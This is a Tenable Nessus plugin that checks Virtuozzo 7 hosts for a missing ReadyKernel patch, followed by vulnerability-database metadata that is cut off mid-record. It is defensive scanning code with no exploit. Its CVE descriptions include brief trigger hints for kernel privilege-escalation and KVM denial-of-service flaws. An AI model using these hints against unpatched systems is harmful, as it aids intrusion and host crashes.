ID VIRTUOZZO_VZA-2017-111.NASL Type nessus Reporter This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2017-12-12T00:00:00
Description
According to the version of the vzkernel package and the
readykernel-patch installed, the Virtuozzo installation on the remote
host is affected by the following vulnerabilities :
CVE-2017-8824: dccp_disconnect() set the socket state to DCCP_CLOSED
but did not properly free some of the resources associated with that
socket (per NVD, reachable via an AF_UNSPEC connect() on a socket in
the DCCP_LISTEN state). This could result in a use-after-free and could
potentially allow a local attacker to escalate their privileges.
CVE-2017-16939: The Linux kernel is vulnerable to a use-after-free
issue that can occur while closing an xfrm netlink socket, in
xfrm_dump_policy_done (per NVD, reachable via a crafted SO_RCVBUF
setsockopt() combined with XFRM_MSG_GETPOLICY netlink messages). A local
user/process could use this flaw to potentially escalate their
privileges on the system.
CVE-2017-1000405: A flaw was found in the patches used to fix the 'Dirty
COW' vulnerability (CVE-2016-5195). An attacker able to run local code
can exploit a race condition in transparent huge pages (THP) to modify
usually read-only huge pages. Per NVD this is less severe than the
original Dirty COW, since regular files cannot be mapped with THP, but
the zero huge page and sealed shmem mappings can still be overwritten.
CVE-2017-1000407: A vulnerability was found in the kernel virtualization
module (KVM) for Intel processors. A guest system could flood I/O port
0x80 (the diagnostic port) with write requests, which could crash the
host kernel, resulting in a denial of service. Unlike the other three
issues, this one is triggered from inside a guest VM rather than by
code running on the host itself.
Note that Tenable Network Security has extracted the preceding
description block directly from the Virtuozzo security advisory.
Tenable has attempted to automatically clean and format it as much as
possible without introducing additional issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration block: runs only when the engine loads the plugin with
# `description` set. It publishes the plugin's metadata (ID, CVEs, CVSS,
# references, dependencies) and exits before the check body below runs.
if (description)
{
script_id(105167);
script_version("3.11");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/04");
# The four CVEs fixed by ReadyKernel patch 39.1-2 for Virtuozzo 7.0.6.
# CVE-2016-5195 (Dirty COW) is deliberately absent: the advisory names it
# only as the vulnerability whose fix (CVE-2017-1000405) was flawed.
script_cve_id(
"CVE-2017-1000405",
"CVE-2017-1000407",
"CVE-2017-16939",
"CVE-2017-8824"
);
script_name(english:"Virtuozzo 7 : readykernel-patch (VZA-2017-111)");
script_summary(english:"Checks the readykernel output for the updated patch.");
script_set_attribute(attribute:"synopsis", value:
"The remote Virtuozzo host is missing a security update.");
# Description text is taken verbatim from the Virtuozzo advisory
# (VZA-2017-111); do not edit it here, it is a runtime string.
script_set_attribute(attribute:"description", value:
"According to the version of the vzkernel package and the
readykernel-patch installed, the Virtuozzo installation on the remote
host is affected by the following vulnerabilities :
- dccp_disconnect() set the socket state to DCCP_CLOSED
but did not properly free some of the resources
associated with that socket. This could result in a
use-after-free and could potentially allow an attacker
to escalate their privileges.
- The Linux kernel is vulnerable to a use-after-free
issue. It could occur while closing a xfrm netlink
socket, in xfrm_dump_policy_done. A user/process could
use this flaw to potentially escalate their privileges
on a system.
- A flaw was found in the patches used to fix the 'Dirty
COW' vulnerability (CVE-2016-5195). An attacker, able
to run local code, can exploit a race condition in
transparent huge pages to modify usually read-only huge
pages.
- A vulnerability was found in the kernel virtualization
module (KVM) for the Intel processors. A guest system
could flood the I/O port 0x80 with write requests,
which could crash the host kernel, resulting in DoS.
Note that Tenable Network Security has extracted the preceding
description block directly from the Virtuozzo security advisory.
Tenable has attempted to automatically clean and format it as much as
possible without introducing additional issues.");
# Vendor advisory page for VZA-2017-111.
script_set_attribute(attribute:"see_also", value:"https://help.virtuozzo.com/customer/portal/articles/2909951");
# https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-37.30-39.1-2.vl7/
# The nessus.org/u? link is presumably a Tenable redirector for the
# readykernel.com patch page named in the comment above.
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?25634872");
script_set_attribute(attribute:"solution", value:"Update the readykernel patch.");
# Scores are the worst case across the bundled CVEs: AV:L/AC:L/Au:N/C:C/I:C/A:C
# (7.2) matches NVD for CVE-2017-16939 and CVE-2017-8824. Note that NVD rates
# CVE-2017-1000407 as AV:A (guest-to-host DoS), so on KVM hosts running
# untrusted guests the "Local" access vector understates real exposure.
script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
# Tenable marks public exploit code as available for this bundle
# (E:POC above); prioritise accordingly when triaging.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"patch_publication_date", value:"2017/12/11");
script_set_attribute(attribute:"plugin_publication_date", value:"2017/12/12");
# Local (credentialed) check: requires SSH access to the target.
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:virtuozzo:virtuozzo:readykernel");
script_set_attribute(attribute:"cpe", value:"cpe:/o:virtuozzo:virtuozzo:7");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"Virtuozzo Local Security Checks");
script_copyright(english:"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
# ssh_get_info.nasl populates the KB keys required below; the check body
# audits out if any of them is missing.
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/Virtuozzo/release", "Host/Virtuozzo/rpm-list", "Host/readykernel-info");
exit(0);
}
include("global_settings.inc");
include("readykernel.inc");
# Check body. Every input below comes from the scanned host over SSH
# (populated by ssh_get_info.nasl); it is only used for regex/substring
# matching here and for the version comparison inside readykernel.inc.
# Bail out unless credentialed local checks are enabled for this host.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
# Confirm the target is Virtuozzo at all (">!<" is NASL's "not a substring").
release = get_kb_item("Host/Virtuozzo/release");
if (isnull(release) || "Virtuozzo" >!< release) audit(AUDIT_OS_NOT, "Virtuozzo");
# Extract "major.minor" (single-digit minor) from the release string, e.g.
# "Virtuozzo Linux release 7.0.6" -> "7.0"; the trailing (\D|$) stops the
# minor digit from matching inside a longer number.
os_ver = pregmatch(pattern: "Virtuozzo Linux release ([0-9]+\.[0-9])(\D|$)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Virtuozzo");
os_ver = os_ver[1];
# Only Virtuozzo 7.x is covered by this advisory.
if (! preg(pattern:"^7([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Virtuozzo 7.x", "Virtuozzo " + os_ver);
# Package list must be present; it is not read here, presumably it is
# consumed by readykernel_execute_checks() in readykernel.inc.
if (!get_kb_item("Host/Virtuozzo/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
# The patch is only published for x86_64 and 32-bit x86 (i386..i686).
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Virtuozzo", cpu);
# Output of the readykernel tool on the target; without it the installed
# live-patch level cannot be determined.
rk_info = get_kb_item("Host/readykernel-info");
if (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, "Virtuozzo");
# Kernel/patch pairs fixed by this advisory. Only the 7.0.6 kernel
# (3.10.0-693.1.1.vz7.37.30) is listed here; other Virtuozzo 7 kernels are
# handled by sibling advisories (VZA-2017-109/110, VZA-2018-004). A host on
# a kernel not in this table is not reported by this plugin.
checks = make_list2(
make_array(
"kernel","vzkernel-3.10.0-693.1.1.vz7.37.30",
"patch","readykernel-patch-37.30-39.1-2.vl7"
)
);
# readykernel_execute_checks() (readykernel.inc, not shown here) is
# expected to report SECURITY_HOLE when the running kernel matches an
# entry and the installed readykernel patch is older than the one listed.
readykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:"Virtuozzo-7");
{"id": "VIRTUOZZO_VZA-2017-111.NASL", "bulletinFamily": "scanner", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-111)", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\n - A vulnerability was found in the kernel virtualization\n module (KVM) for the Intel processors. A guest system\n could flood the I/O port 0x80 with write requests,\n which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "published": "2017-12-12T00:00:00", "modified": "2017-12-12T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/105167", "reporter": "This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://www.nessus.org/u?25634872", "https://help.virtuozzo.com/customer/portal/articles/2909951"], "cvelist": ["CVE-2017-8824", "CVE-2017-1000407", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "type": "nessus", "lastseen": "2021-01-06T09:13:20", "edition": 31, "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "virtuozzo", "idList": ["VZA-2017-113", "VZA-2018-004", "VZA-2017-110", "VZA-2017-111", "VZA-2017-109", "VZA-2017-114"]}, {"type": "cve", "idList": ["CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000407", "CVE-2017-1000405", "CVE-2017-8824"]}, {"type": "nessus", "idList": ["VIRTUOZZO_VZA-2017-114.NASL", "PHOTONOS_PHSA-2017-2_0-0008_LINUX.NASL", "UBUNTU_USN-3510-1.NASL", "SUSE_SU-2017-3226-1.NASL", "PHOTONOS_PHSA-2017-1_0-0093_LINUX.NASL", "VIRTUOZZO_VZA-2017-109.NASL", "VIRTUOZZO_VZA-2018-004.NASL", "SUSE_SU-2017-3225-1.NASL", "UBUNTU_USN-3511-1.NASL", "VIRTUOZZO_VZA-2017-110.NASL"]}, {"type": "attackerkb", "idList": ["AKB:B6D57715-C0B3-48BB-8FDE-F3868F92DB1F"]}, {"type": "android", "idList": ["ANDROID:CVE-2016-5195"]}, {"type": "seebug", "idList": ["SSV:96908"]}, {"type": "f5", "idList": ["SOL10558632", "F5:K15526101", "F5:K10558632", "F5:K81158013"]}, {"type": "suse", "idList": ["SUSE-SU-2017:3226-1", "SUSE-SU-2017:3225-1", "SUSE-SU-2017:3285-1", "SUSE-SU-2017:3324-1", "SUSE-SU-2017:3319-1", "SUSE-SU-2017:3297-1", "SUSE-SU-2017:3317-1", "SUSE-SU-2017:3300-1", "SUSE-SU-2017:3314-1", "SUSE-SU-2017:3284-1"]}, {"type": "ubuntu", "idList": ["USN-3511-1", "USN-3510-1", "USN-3507-2", "USN-3510-2", "USN-3509-2", "USN-3509-4", "USN-3509-3", "USN-3508-2", "USN-3508-1", "USN-3509-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310843403", "OPENVAS:1361412562310843400", "OPENVAS:1361412562310873860", "OPENVAS:1361412562310843393", "OPENVAS:1361412562310843397", "OPENVAS:1361412562310873857", "OPENVAS:1361412562310843394", "OPENVAS:1361412562310843402", "OPENVAS:1361412562310843396", 
"OPENVAS:1361412562310843398"]}, {"type": "threatpost", "idList": ["THREATPOST:A28CC7C8B76DAF5EBFF24CE8575A2087"]}, {"type": "redhat", "idList": ["RHSA-2018:0180", "RHSA-2018:0399"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:74EC63FE794662FC4DFD36709B39475A", "CFOUNDRY:0BD4290D520A235B05B93F0ACF4B7C2B"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:F867C230BBE8FA4BCFE72E04CBAC881F", "EXPLOITPACK:21E02FD686B4E07E01D154BAF895DE82", "EXPLOITPACK:D8B1BFCB08D0FAA92CCBDBD01EF88A3F"]}, {"type": "exploitdb", "idList": ["EDB-ID:43234", "EDB-ID:44305", "EDB-ID:43199", "EDB-ID:44049"]}, {"type": "fedora", "idList": ["FEDORA:22E2B607603F", "FEDORA:3CCDE601B23D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145235"]}, {"type": "zdt", "idList": ["1337DAY-ID-29141"]}, {"type": "amazon", "idList": ["ALAS-2017-937"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-4131"]}], "modified": "2021-01-06T09:13:20", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-01-06T09:13:20", "rev": 2}, "vulnersScore": 7.5}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105167);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-1000405\",\n \"CVE-2017-1000407\",\n \"CVE-2017-16939\",\n \"CVE-2017-8824\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-111)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - 
dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\n - A vulnerability was found in the kernel virtualization\n module (KVM) for the Intel processors. A guest system\n could flood the I/O port 0x80 with write requests,\n which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2909951\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-37.30-39.1-2.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?25634872\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.1.1.vz7.37.30\",\n \"patch\",\"readykernel-patch-37.30-39.1-2.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "naslFamily": "Virtuozzo Local Security Checks", "pluginID": "105167", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "scheme": null, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}}
{"virtuozzo": [{"lastseen": "2019-11-05T11:27:45", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8824", "CVE-2017-1000407", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernel 3.10.0-693.1.1.vz7.37.30 (Virtuozzo 7.0.6).\n**Vulnerability id:** CVE-2017-8824\ndccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n**Vulnerability id:** CVE-2017-1000405\nA flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.\n\n**Vulnerability id:** CVE-2017-1000407\nA vulnerability was found in the kernel virtualization module (KVM) for the Intel processors. 
A guest system could flood the I/O port 0x80 with write requests, which could crash the host kernel, resulting in DoS.\n\n", "edition": 1, "modified": "2017-12-11T00:00:00", "published": "2017-12-11T00:00:00", "id": "VZA-2017-111", "href": "https://help.virtuozzo.com/customer/portal/articles/2909951", "title": "Important kernel update: CVE-2017-8824 and other; Virtuozzo ReadyKernel patch 39.1 for Virtuozzo 7.0.6", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:06", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8824", "CVE-2017-1000407", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernel 3.10.0-514.26.1.vz7.33.22 (Virtuozzo 7.0.5).\n**Vulnerability id:** CVE-2017-8824\ndccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n**Vulnerability id:** CVE-2017-1000405\nA flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.\n\n**Vulnerability id:** CVE-2017-1000407\nA vulnerability was found in the kernel virtualization module (KVM) for the Intel processors. 
A guest system could flood the I/O port 0x80 with write requests, which could crash the host kernel, resulting in DoS.\n\n", "edition": 1, "modified": "2017-12-11T00:00:00", "published": "2017-12-11T00:00:00", "id": "VZA-2017-110", "href": "https://help.virtuozzo.com/customer/portal/articles/2909950", "title": "Important kernel update: CVE-2017-8824 and other; Virtuozzo ReadyKernel patch 39.1 for Virtuozzo 7.0.5", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:09", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8824", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernels 3.10.0-514.16.1.vz7.30.10 (Virtuozzo 7.0.4) and 3.10.0-514.16.1.vz7.30.15 (Virtuozzo 7.0.4 HF3)\n**Vulnerability id:** CVE-2017-8824\ndccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n**Vulnerability id:** CVE-2017-1000405\nA flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). 
An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.\n\n", "edition": 1, "modified": "2017-12-11T00:00:00", "published": "2017-12-11T00:00:00", "id": "VZA-2017-109", "href": "https://help.virtuozzo.com/customer/portal/articles/2909949", "title": "Important kernel update: CVE-2017-8824 and other; Virtuozzo ReadyKernel patch 39.2 for Virtuozzo 7.0.4 and 7.0.4 HF3", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:19", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15129", "CVE-2017-8824", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-18017", "CVE-2017-1000405"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernels 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0), 3.10.0-327.42.0.vz7.18.7 (Virtuozzo 7.0.1), and 3.10.0-327.42.0.vz7.20.18 (Virtuozzo 7.0.3).\n**Vulnerability id:** CVE-2017-8824\nA vulnerability was found in DCCP socket handling code. dccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n**Vulnerability id:** CVE-2017-15129\nThe function get_net_ns_by_id() does not check the net.count value when processing a peer network, which could lead to double free and memory corruption. 
An unprivileged local user could use this vulnerability to crash the system.\n\n**Vulnerability id:** CVE-2017-18017\nIf the system uses iptables and there are iptables rules with TCPMSS action there, a remote attacker could cause a denial of service (use-after-free in tcpmss_mangle_packet function leading to memory corruption) or possibly have unspecified other impact by sending specially crafted network packets.\n\n**Vulnerability id:** CVE-2017-1000405\nA flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). An attacker, able to run local code, could exploit a race condition in transparent huge pages to modify usually read-only huge pages.\n\n", "edition": 1, "modified": "2018-01-12T00:00:00", "published": "2018-01-12T00:00:00", "id": "VZA-2018-004", "href": "https://help.virtuozzo.com/customer/portal/articles/2915392", "title": "Important kernel security update: CVE-2017-8824 and other; Virtuozzo ReadyKernel patch 42.0 for Virtuozzo 7.0.0, 7.0.1, and 7.0.3", "type": "virtuozzo", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:27:52", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8824", "CVE-2017-16939"], "description": "This update provides a new Virtuozzo 6.0 kernel 2.6.32-042stab126.2 based on the Red Hat Enterprise Linux 6.9 kernel 2.6.32-696.16.1.el6. The new kernel introduces security and stability fixes.\n**Vulnerability id:** CVE-2017-8824\ndccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. 
A user/process could use this flaw to potentially escalate their privileges on a system.\n\n", "edition": 1, "modified": "2017-12-15T00:00:00", "published": "2017-12-15T00:00:00", "id": "VZA-2017-114", "href": "https://help.virtuozzo.com/customer/portal/articles/2910907", "title": "Important kernel security update: CVE-2017-8824 and other; new kernel 2.6.32-042stab126.2, Virtuozzo 6.0 Update 12 Hotfix 19 (6.0.12-3689)", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:18", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8824", "CVE-2017-16939"], "description": "This update provides a new Virtuozzo Containers for Linux 4.7 and Server Bare Metal 5.0 kernel 2.6.32-042stab126.2 based on the Red Hat Enterprise Linux 6.9 kernel 2.6.32-696.16.1.el6. The new kernel introduces security and stability fixes.\n**Vulnerability id:** CVE-2017-8824\ndccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. 
A user/process could use this flaw to potentially escalate their privileges on a system.\n\n", "edition": 1, "modified": "2017-12-15T00:00:00", "published": "2017-12-15T00:00:00", "id": "VZA-2017-113", "href": "https://help.virtuozzo.com/customer/portal/articles/2910906", "title": "Important kernel security update: CVE-2017-8824 and other; new kernel 2.6.32-042stab126.2 for Virtuozzo Containers for Linux 4.7, Server Bare Metal 5.0", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T20:13:19", "description": "The Linux Kernel 2.6.32 and later are affected by a denial of service, by flooding the diagnostic port 0x80 an exception can be triggered leading to a kernel panic.", "edition": 18, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2017-12-11T21:29:00", "title": "CVE-2017-1000407", "type": "cve", "cwe": ["CWE-754"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.1, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000407"], "modified": "2019-05-14T22:29:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:canonical:ubuntu_linux:17.10", 
